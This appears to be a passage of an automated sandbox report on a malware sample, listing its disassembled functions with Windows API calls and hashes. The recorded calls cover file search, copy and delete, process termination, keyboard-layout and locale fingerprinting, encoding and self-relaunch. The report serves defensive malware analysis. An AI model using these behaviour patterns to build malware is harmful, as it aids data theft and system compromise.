                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(?,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001,?), ref: 009D0B53
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,?), ref: 009D0B65
                                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000360), ref: 009D0B79
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,00000360), ref: 009D0B86
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memcpy$File$Pointerlstrcpy$??2@CountDesktopTickWindowWritelstrcatlstrlenrandsrand
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1984286156-0
                                                                                                                                                                                                                                                  • Opcode ID: 0de04a429b108b3094ed54c2502a3bbd25c40d52149ebe7d8a02eda4e25a9bc7
                                                                                                                                                                                                                                                  • Instruction ID: 90f676071d5fe4d2e9a111606d256d81ec0ccb6a07885b51cee430de6cbc6246
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0de04a429b108b3094ed54c2502a3bbd25c40d52149ebe7d8a02eda4e25a9bc7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF7284246093949FCB61AF25C8A5B6F7FAAAFD6340F0444ADF8C94B343D7349905CB62
                                                                                                                                                                                                                                                  Function 0040D820 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 442fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,?,?,\*.*,0042EEFC), ref: 0040D891
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
                                                                                                                                                                                                                                                    • Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040DC89
                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,00000000), ref: 0040DD67
                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(?), ref: 0040DDA0
                                                                                                                                                                                                                                                  • FindClose.KERNEL32(?), ref: 0040DDB1
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$Findlstrcpy$CloseCopyDeleteFirstNextlstrcatlstrlen
                                                                                                                                                                                                                                                  • String ID: \*.*$q:d$q:d$q:d
                                                                                                                                                                                                                                                  • API String ID: 124472186-1383382868
                                                                                                                                                                                                                                                  • Opcode ID: cb5de748d47e18521a663841614ad92215ed0099e6ebd374e2969049b16209e8
                                                                                                                                                                                                                                                  • Instruction ID: fd5909e8a48491a8fe3474c087fdb49959fee0d6d26b23eadbfe979ac181219e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb5de748d47e18521a663841614ad92215ed0099e6ebd374e2969049b16209e8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20F165B8A002185ACB06FF62C8D59FE7B769F45749F00442EF412572D2DF289F89CB99
                                                                                                                                                                                                                                                  Function 009C986A Relevance: 13.8, APIs: 9, Instructions: 316stringfileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 009C98BC
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042EEFC), ref: 009C99A2
                                                                                                                                                                                                                                                  • PathMatchSpecA.SHLWAPI(?,?), ref: 009C9A22
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009C9A48
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009C9A81
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00644BCD), ref: 009C9A89
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009C9A97
                                                                                                                                                                                                                                                    • Part of subcall function 009C39A7: lstrcpy.KERNEL32(00000000), ref: 009C39CA
                                                                                                                                                                                                                                                    • Part of subcall function 009C7BE4: Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009C7C8E
                                                                                                                                                                                                                                                    • Part of subcall function 009C7BE4: CreateThread.KERNEL32(00000000,00000000,0041A90D,?,00000000,00000000), ref: 009C7CE0
                                                                                                                                                                                                                                                    • Part of subcall function 009C7BE4: WaitForSingleObject.KERNEL32(00000000,000003E8,?,?,?,?,?,?,?,?,?,?,?,?,009B1A24,?), ref: 009C7CEC
                                                                                                                                                                                                                                                    • Part of subcall function 009C986A: FindNextFileA.KERNEL32(00000000,?), ref: 009C9CB6
                                                                                                                                                                                                                                                    • Part of subcall function 009C986A: FindClose.KERNEL32(00000000), ref: 009C9CC5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcat$Find$File$CloseCreateFirstMatchNextObjectPathSingleSleepSpecThreadWaitlstrcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3744366743-0
                                                                                                                                                                                                                                                  • Opcode ID: 00f26f1d4340412f04d36141e4c609a0aa82bd52beccc6cf5ccb4e54d5e617c6
                                                                                                                                                                                                                                                  • Instruction ID: 636fc11100edd80c108bf2b0d7234a6380e2e4285d75bbc441757c5d8a3981fe
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 00f26f1d4340412f04d36141e4c609a0aa82bd52beccc6cf5ccb4e54d5e617c6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DDD1BC35D006499BDB01DFA0DC86FEDBBBAFF8A304F009149E90567152DF74AA85CB92
                                                                                                                                                                                                                                                  Function 009C550C Relevance: 13.6, APIs: 9, Instructions: 57processCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009C5524
                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,?), ref: 009C552E
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 009C553A
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,?), ref: 009C5554
                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009C5568
                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 009C5577
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009C557E
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 009C558B
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009C5596
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3836391474-0
                                                                                                                                                                                                                                                  • Opcode ID: 744bf93798593bbbf3aff87105b76b44fa1c2028e89e1f0adc62def67fc8c5fa
                                                                                                                                                                                                                                                  • Instruction ID: 47901f9672bc51f2051dfa9a019951dca8ef90b42415b6cafbe3e3f2c54b5df8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 744bf93798593bbbf3aff87105b76b44fa1c2028e89e1f0adc62def67fc8c5fa
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1411C4396007456FD3202B61AC4EF6B7BAEFF86B51F05102CFA0596151EF74A851CA62
                                                                                                                                                                                                                                                  Function 009C92FC Relevance: 12.3, APIs: 8, Instructions: 272stringfilememoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 009C930E
                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(?,?), ref: 009C95A7
                                                                                                                                                                                                                                                  • FindClose.KERNEL32(?), ref: 009C95B8
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009C95D0
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 009C95DD
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 009C95E9
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 009C9603
                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 009C936A
                                                                                                                                                                                                                                                    • Part of subcall function 009C39A7: lstrcpy.KERNEL32(00000000), ref: 009C39CA
                                                                                                                                                                                                                                                    • Part of subcall function 009C8F80: memset.MSVCRT ref: 009C8F9C
                                                                                                                                                                                                                                                    • Part of subcall function 009C8F80: memset.MSVCRT ref: 009C8FAD
                                                                                                                                                                                                                                                    • Part of subcall function 009C8F80: lstrcat.KERNEL32(?), ref: 009C8FEB
                                                                                                                                                                                                                                                    • Part of subcall function 009C8F80: lstrcat.KERNEL32(?,?), ref: 009C8FF9
                                                                                                                                                                                                                                                    • Part of subcall function 009C8F80: lstrcat.KERNEL32(?), ref: 009C9006
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcat$Find$Filelstrlenmemset$CloseFirstHeapNextProcesslstrcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 365803619-0
                                                                                                                                                                                                                                                  • Opcode ID: 086b2853c8734edb0c8109cc3b413a3d6e782f6078e460423ab1a0194b1db5fd
                                                                                                                                                                                                                                                  • Instruction ID: cdc8d9a0484c3a7c363a08caffff3066f53b200da6b6fb9eb237bfe7cc59b896
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 086b2853c8734edb0c8109cc3b413a3d6e782f6078e460423ab1a0194b1db5fd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06B17C35D002589BDB01EFA4DC86FEE7BB5BF89304F00A15DE90567192DFB0AA85CB52
                                                                                                                                                                                                                                                  Function 009C8952 Relevance: 12.2, APIs: 8, Instructions: 190stringfileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 009C89A7
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009C8A6B
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 009C8A78
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009C8A86
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009C8A93
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 009C8ACD
                                                                                                                                                                                                                                                    • Part of subcall function 009C3975: lstrcpy.KERNEL32(00000000,?), ref: 009C3999
                                                                                                                                                                                                                                                    • Part of subcall function 009C39A7: lstrcpy.KERNEL32(00000000), ref: 009C39CA
                                                                                                                                                                                                                                                    • Part of subcall function 009C7BE4: Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009C7C8E
                                                                                                                                                                                                                                                    • Part of subcall function 009C7BE4: CreateThread.KERNEL32(00000000,00000000,0041A90D,?,00000000,00000000), ref: 009C7CE0
                                                                                                                                                                                                                                                    • Part of subcall function 009C7BE4: WaitForSingleObject.KERNEL32(00000000,000003E8,?,?,?,?,?,?,?,?,?,?,?,?,009B1A24,?), ref: 009C7CEC
                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 009C8BB6
                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 009C8BC5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcat$Find$Filelstrcpy$CloseCreateFirstNextObjectSingleSleepThreadWait
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 888904454-0
                                                                                                                                                                                                                                                  • Opcode ID: 1289c8857d586a46948a72ea4e672cf2eaa2f5b027f9c57f8ed3330df6fd0136
                                                                                                                                                                                                                                                  • Instruction ID: 943b9a62d0a10178e5c732f0f6878a33d8e544a93b0f85b6cf4c6215ab606614
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1289c8857d586a46948a72ea4e672cf2eaa2f5b027f9c57f8ed3330df6fd0136
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3819B75C00658DBDB11DFA0DC82FEAB7B9FF49300F00919DE94567251EB70AA89CB91
                                                                                                                                                                                                                                                  Function 009B5D92 Relevance: 10.7, Strings: 8, Instructions: 731COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 0000$0000$0000$0000$3qB$IrB$ItB$RzB
                                                                                                                                                                                                                                                  • API String ID: 0-4004772278
                                                                                                                                                                                                                                                  • Opcode ID: 1e84449b940aa7246dd064ff38d4c4a538903fec837c583de1718d436a8a299e
                                                                                                                                                                                                                                                  • Instruction ID: e58864e2b92d10baf817651462a2313014e0b4de3663106a1d3da201be489694
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e84449b940aa7246dd064ff38d4c4a538903fec837c583de1718d436a8a299e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98825CA09087E49DE712CF28AD093927FB3AB17328F04725DC4854A3B2D7B95789C7D9
                                                                                                                                                                                                                                                  Function 009CC201 Relevance: 7.7, APIs: 5, Instructions: 186COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009CC21F
                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 009CC245
                                                                                                                                                                                                                                                    • Part of subcall function 009C3975: lstrcpy.KERNEL32(00000000,?), ref: 009C3999
                                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(?), ref: 009CC44A
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009CC46D
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 009CC47D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memset$ExecuteExitFileModuleNameProcessShelllstrcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3423973079-0
                                                                                                                                                                                                                                                  • Opcode ID: 24f43bb3527911016e82c6304e7adf950fb8ea5c774f849889b6f01b72f090a7
                                                                                                                                                                                                                                                  • Instruction ID: f72edf190fa29a9758a86bbd00748bdc374802e326a919585203588330e01687
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24f43bb3527911016e82c6304e7adf950fb8ea5c774f849889b6f01b72f090a7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0A610860F047805BE7159F349892B7E7BA69FDB304F04D62DF4DA87282CB785A85C392
                                                                                                                                                                                                                                                  Function 009C413E Relevance: 7.6, APIs: 5, Instructions: 86memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 009C3975: lstrcpy.KERNEL32(00000000,?), ref: 009C3999
                                                                                                                                                                                                                                                  • GetKeyboardLayoutList.USER32(00000000,00000000,0042EEFC), ref: 009C415D
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 009C416F
                                                                                                                                                                                                                                                  • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 009C4179
                                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 009C41A2
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,00000000,00000200,?,?,?), ref: 009C4245
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3090951853-0
                                                                                                                                                                                                                                                  • Opcode ID: 544f6d7a26ade535f44ad9235432a807762fd0ca6bd9a68562a0e95ac78c3c38
                                                                                                                                                                                                                                                  • Instruction ID: 0ae5fb245ac0259bb75fd4abfecd00e08b5b1c4ecdd0f994e72933c711365766
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 544f6d7a26ade535f44ad9235432a807762fd0ca6bd9a68562a0e95ac78c3c38
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D218235B04254AFD320AB60AC9AF6B7BADEBC5704F00941DBA9A47182CE795D18C762
                                                                                                                                                                                                                                                  Function 009C4DD7 Relevance: 7.6, APIs: 5, Instructions: 66memoryencryptionCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,009B7653,?,?,?,?,?), ref: 009C4E0D
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,009B7653,?,?,?,?,?), ref: 009C4E20
                                                                                                                                                                                                                                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,009B7653,?,?,?,?,?), ref: 009C4E41
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,009B7653,?,?,?,?,?), ref: 009C4E5B
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,009B7653,?,?,?,?,?), ref: 009C4E69
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: BinaryCryptHeapProcessString$ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1339486156-0
                                                                                                                                                                                                                                                  • Opcode ID: 7589891c4f873d9eacc06b29ea4d395704f2ffe9cccf2032afe3450d41c03d5a
                                                                                                                                                                                                                                                  • Instruction ID: f6a8ffdcf4002551438dbcf33ef178de419b3d854c929cf720d5646cb3ab4a16
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7589891c4f873d9eacc06b29ea4d395704f2ffe9cccf2032afe3450d41c03d5a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 00115B76604205AFE7209FA5AC98F17BBADFB9A794F56042CF99093220CB71DC148B61
                                                                                                                                                                                                                                                  Function 009C5468 Relevance: 7.5, APIs: 5, Instructions: 39processCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009C547E
                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000), ref: 009C5488
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000), ref: 009C549F
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,?), ref: 009C54AB
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009C54BC
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 420147892-0
                                                                                                                                                                                                                                                  • Opcode ID: 5012a1a39373a8439626fa26436eeae440fc5d79da291cd707dce7a7579f2252
                                                                                                                                                                                                                                                  • Instruction ID: dbb91dac83da069745599fa7a128fc0142784624bc5946ce06849a601b42160b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5012a1a39373a8439626fa26436eeae440fc5d79da291cd707dce7a7579f2252
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AF09031601A056BE3205B21ED4EFAB7BACDF86756F010428F905D6190EA38A995C762
                                                                                                                                                                                                                                                  Function 009C40BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40memorytimeCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,00644A23,?,?,?,?,?,?,00644A98,?,?,00644A23,?,?,?), ref: 009C40C9
                                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32 ref: 009C40DE
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: HeapInformationProcessTimeZone
                                                                                                                                                                                                                                                  • String ID: wwww
                                                                                                                                                                                                                                                  • API String ID: 3869334356-671953474
                                                                                                                                                                                                                                                  • Opcode ID: ab4f5e0465bb3e6a8121483e4f84586011c19975fa269fce5d75153393847ed2
                                                                                                                                                                                                                                                  • Instruction ID: f311c3c185aff5f1332f93aa5ffb917ef86f2a227537daf0db163c285c7ce311
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab4f5e0465bb3e6a8121483e4f84586011c19975fa269fce5d75153393847ed2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1F0AF79F042505BD714977CBC0BB863A6B6BEB715F096228E280CB2E4DE705C5487CA
                                                                                                                                                                                                                                                  Function 0041FC76 Relevance: 4.6, APIs: 3, Instructions: 67timeCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 0041FCD9
                                                                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041FCE5
                                                                                                                                                                                                                                                    • Part of subcall function 0041F6ED: FileTimeToSystemTime.KERNEL32(?,?,?,0041FC19,?,?,?), ref: 0041F710
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041FD17
                                                                                                                                                                                                                                                  Memory Dump Source
